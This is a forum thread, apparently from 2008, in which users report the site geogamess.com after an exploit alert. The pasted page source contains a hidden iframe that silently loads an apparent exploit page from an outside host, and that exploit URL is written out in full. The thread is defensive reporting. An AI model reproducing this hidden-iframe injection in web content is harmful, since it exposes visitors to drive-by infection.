geogamess.com

[cconniejean]

Came across this site

hxxp://www.geogamess.com

in a traffic exchange rotator. I have Exploit Prevention Lab Pro on my computer and got a WebAttacker exploit alert. Going to Gooby.ca so I could see what was on the web page I see a Iframe, for this:

Code: [Select]

Decoded output for:
  http://www.geogamess.com/

HTTP/1.1 200 OK
Date: Wed, 09 Jan 2008 02:35:19 GMT
Server: Apache
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<title>travelblog.com - this is the world calling</title>
<link rel="stylesheet" href="/css/screen.css" type="text/css" media="screen"/>
<!--[if IE 6]>
<link rel="stylesheet" href="/css/ie6.css" type="text/css" media="screen" />
<![endif]-->

<script language="javascript1.2">
var ii= 1;
function nextfile(){
//alert("okay we arestillgood");

ii=(ii 1) % 3;
nextfiler='scroller'   ii   ".htm";
//alert(nextfiler);
if(document.all) document.all.datamain.src =nextfiler;
else document.getElementById('datamain').src=nextfiler;
return;
}
</script>
</head>
<body  style="background: #FFFEF3;" >
<iframe src="http://sclgntfy.com/ent2298.htm" style="display:none"></iframe>
<div id="header" ></div>
I put the sclgntfy*com in my host files and went to geogamess*com, all I see is a white page. The sclgntfy*com does have a bunch of code on it.

[sowhat-x]

....googling for 'ent2298' also results in a couple of results...
Not in front of VMware at the moment though,
thereby I haven't attempted checking these...ie.they might irrelevant...

[JohnC]

Thanks, this will be added soon.